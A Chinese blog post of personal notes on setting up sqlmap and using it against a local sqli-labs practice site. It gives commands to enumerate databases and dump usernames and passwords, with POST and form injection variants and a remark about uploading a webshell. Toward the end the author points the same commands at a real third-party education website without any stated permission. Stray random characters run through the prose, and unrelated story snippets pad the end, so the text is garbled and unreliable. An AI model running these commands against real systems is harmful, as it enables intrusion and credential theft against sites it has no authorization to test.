sqlmap

sqlmap 基于Python2.7

因為我平時用得是 Python3.6腻要,所以這里切換一下:

py2和3都安裝結束后 接下來就是檢查環(huán)境變量柒竞,缺少的我們需要添加。
在path中找以下4個變量

1.c:\Python27
2.c:\Python27\Scripts
3.c:\Python36
4.c:\Python36\Scripts

少哪個加哪個霸琴,注意分號隔開

然后就能: py -2
py -3
實現版本切換了椒振。但是不穩(wěn)定


py版本切換.png

把sqlmap解壓到Python27里,再在文件夾里新建.bat文件物舒,(cmd.exe),以實現直接打開此地址的命令斋配。

輸入: sqlmap.py -h 啟動sqlmap

某道友寫的操作:http://www.reibang.com/p/17509d0a1ba3

以第一關測試下:

C:\Python27\sqlmapproject-sqlmap-509bb41>sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1"

會得到:

圖1
1.png
sqlmap功能作用.png
查看數據量.png

貌似很重要的東西呢

--current-db     當前使用數據庫
--current-user   當其使用用戶名
--count -D "security"    查看數據量
--privileges     查看用戶權限(比較長
--delay 5   或  -safe-freq  延時注入

大概MySQL的注入順序:
圖2


2.png

最后的報字段這樣寫: --dump -C "username" -T "users" -D "security"

空格很重要

交互式:禮尚往來
注入點的用戶權限必須最高
webshell?
似乎可以通過這個上傳腳本木馬

python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C"id,password,username" --dump 報字段的具體內容

post注入可以說是靈魂了

burp抓文件:

python sqlmap.py -r "C:\233" -p uname --dbs  (規(guī)則同上) uname看源代碼
-p uname -D security --tables               猜表
-p uname -D security -T users --columns     猜列

發(fā)送給本頁面自己:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --forms
form表單action=" "   也會給出payload

指定下參數:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --data "uname=1&passwd=1"

下面那些就是無意義的嘗試了

http://i.mooc.chaoxing.com/space/index.shtml
python sqlmap.py -u "http://i.mooc.chaoxing.com/space/index.shtml" --forms
form表單action=" "
python sqlmap.py -r "C:\23333\244" -p password --dbs

C:\23333

python sqlmap.py -u "http://127.0.0.1/message/register.php" --forms
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --data "nam=1&pwd=1"
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
  • 序言:七十年代末招刨,一起剝皮案震驚了整個濱河市夹供,隨后出現的幾起案子灵份,更是在濱河造成了極大的恐慌,老刑警劉巖哮洽,帶你破解...
    沈念sama閱讀 206,311評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件填渠,死亡現場離奇詭異,居然都是意外死亡鸟辅,警方通過查閱死者的電腦和手機揭蜒,發(fā)現死者居然都...
    沈念sama閱讀 88,339評論 2 382
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來剔桨,“玉大人屉更,你說我怎么就攤上這事∪髯海” “怎么了瑰谜?”我有些...
    開封第一講書人閱讀 152,671評論 0 342
  • 文/不壞的土叔 我叫張陵,是天一觀的道長树绩。 經常有香客問我萨脑,道長,這世上最難降的妖魔是什么饺饭? 我笑而不...
    開封第一講書人閱讀 55,252評論 1 279
  • 正文 為了忘掉前任渤早,我火速辦了婚禮,結果婚禮上瘫俊,老公的妹妹穿的比我還像新娘鹊杖。我一直安慰自己,他們只是感情好扛芽,可當我...
    茶點故事閱讀 64,253評論 5 371
  • 文/花漫 我一把揭開白布骂蓖。 她就那樣靜靜地躺著,像睡著了一般川尖。 火紅的嫁衣襯著肌膚如雪登下。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,031評論 1 285
  • 那天叮喳,我揣著相機與錄音被芳,去河邊找鬼。 笑死馍悟,一個胖子當著我的面吹牛畔濒,可吹牛的內容都是我干的。 我是一名探鬼主播赋朦,決...
    沈念sama閱讀 38,340評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼篓冲,長吁一口氣:“原來是場噩夢啊……” “哼李破!你這毒婦竟也來了?” 一聲冷哼從身側響起壹将,我...
    開封第一講書人閱讀 36,973評論 0 259
  • 序言:老撾萬榮一對情侶失蹤嗤攻,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后诽俯,有當地人在樹林里發(fā)現了一具尸體妇菱,經...
    沈念sama閱讀 43,466評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 35,937評論 2 323
  • 正文 我和宋清朗相戀三年暴区,在試婚紗的時候發(fā)現自己被綠了闯团。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,039評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡仙粱,死狀恐怖房交,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情伐割,我是刑警寧澤候味,帶...
    沈念sama閱讀 33,701評論 4 323
  • 正文 年R本政府宣布,位于F島的核電站隔心,受9級特大地震影響白群,放射性物質發(fā)生泄漏。R本人自食惡果不足惜硬霍,卻給世界環(huán)境...
    茶點故事閱讀 39,254評論 3 307
  • 文/蒙蒙 一帜慢、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧唯卖,春花似錦粱玲、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,259評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至撩轰,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間昧廷,已是汗流浹背堪嫂。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評論 1 262
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留木柬,地道東北人皆串。 一個月前我還...
    沈念sama閱讀 45,497評論 2 354
  • 正文 我出身青樓,卻偏偏與公主長得像眉枕,于是被迫代替她去往敵國和親恶复。 傳聞我的和親對象是個殘疾皇子怜森,可洞房花燭夜當晚...
    茶點故事閱讀 42,786評論 2 345

推薦閱讀更多精彩內容